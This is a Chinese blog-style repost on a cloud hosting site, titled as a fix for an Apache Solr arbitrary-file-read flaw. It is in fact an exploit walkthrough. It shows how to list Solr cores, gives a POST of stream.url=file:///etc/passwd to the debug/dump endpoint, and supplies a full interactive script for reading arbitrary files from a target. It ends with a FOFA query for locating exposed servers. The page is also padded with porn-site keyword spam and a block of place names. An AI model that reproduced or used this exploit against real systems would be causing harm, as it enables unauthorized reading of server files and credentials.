亚洲激情专区-91九色丨porny丨老师-久久久久久久女国产乱让韩-国产精品午夜小视频观看

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

Apache-Solr任意文件讀取exp怎么解決

發布時間:2021-12-23 11:39:58 來源:億速云 閱讀:185 作者:iii 欄目:安全技術

本篇內容主要講解“Apache-Solr任意文件讀取exp怎么解決”,感興趣的朋友不妨來看看。本文介紹的方法操作簡單快捷,實用性強。下面就讓小編來帶大家學習“Apache-Solr任意文件讀取exp怎么解決”吧!

Apache-Solr任意文件讀取exp

漏洞利用方式很簡單,但是網上說的不是很完整。

首先我們需要訪問:

/solr/admin/cores?indexInfo=false&wt=json

然后看相應數據:

{
  "responseHeader":{
    "status":0,
    "QTime":0},
  "initFailures":{},
  "status":{
    "ingredients":{
      "name":"ingredients",
      "instanceDir":"/var/solr/data/ingredients",
      "dataDir":"/var/solr/data/ingredients/data/",
      "config":"solrconfig.xml",
      "schema":"schema.xml",
      "startTime":"2021-03-18T11:41:26.398Z",
      "uptime":211644}}}

差不多這個樣子,ingredients就是我們需要的

構造路徑:

"/solr/".ins."/debug/dump?param=ContentStreams&wt=json"

ins就是我們得到的實例對象的名稱

他們說會返回xml格式的,網上的都是不帶wt=json,但是我發現,dump接受這個參數,也會輸出json格式

并且我們在上面獲取ins的時候是可以判斷服務器類型的

上面的話呢應該是:

/solr/ingredients/debug/dump?param=ContentStreams&wt=json

然后是個post數據包,路徑有了,內容就是:

stream.url=file:///etc/passwd

然后也會得到一個json,這里就不帶結果了

最后附上exp:

#define insqian = "name":"
#define inshou = "
#define contentqian = "stream":"
#define contenthou = "}]
function Getinstance(url){
	res = HttpGetSafe(url."/solr/admin/cores?indexInfo=false&wt=json","User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0");
	if(StrFindStr(res[0],"initFailures",0) == "-1"){
		return "";
	}
	return GettextMiddle(res[0],insqian,inshou);
}
function GetFileContent(url,ins,FilePath){
	res = HttpPostSafe(url."/solr/".ins."/debug/dump?param=ContentStreams&wt=json","stream.url=file://".FilePath,"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0");
	con = GettextMiddle(res[0],contentqian,contenthou);
	return StrReplace(con,"\\n",StrRN());
	
}

function main(args){
	print("請輸入測試的站點:");
	url = input();
	ins = Getinstance(url);
	if(ins == ""){
		print("不存在漏洞");
	}else{
		print("可能存在漏洞,instanceName:".ins.",請輸入要查看的文件名稱:");
		wb = input();
		while(wb != "exit"){
			print(GetFileContent(url,ins,wb));
			wb = input();
		}
	}
}

帶一張效果圖:

Apache-Solr任意文件讀取exp怎么解決

fofa搜索:

app="Apache-Solr"

到此,相信大家對“Apache-Solr任意文件讀取exp怎么解決”有了更深的了解,不妨來實際操作一番吧!這里是億速云網站,更多相關內容可以進入相關頻道進行查詢,關注我們,繼續學習!

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

南丹县| 宜良县| 蒙阴县| 化隆| 巴彦淖尔市| 栾川县| 得荣县| 竹山县| 曲阳县| 武穴市| 博客| 叶城县| 衡南县| 贵定县| 枣强县| 锦州市| 合川市| 鲁甸县| 弥渡县| 乌什县| 特克斯县| 韶山市| 崇仁县| 枝江市| 莱芜市| 五大连池市| 连云港市| 沭阳县| 栾城县| 乌拉特后旗| 丹阳市| 怀柔区| 榆林市| 万源市| 建瓯市| 交口县| 淮安市| 麦盖提县| 康定县| 凯里市| 柯坪县|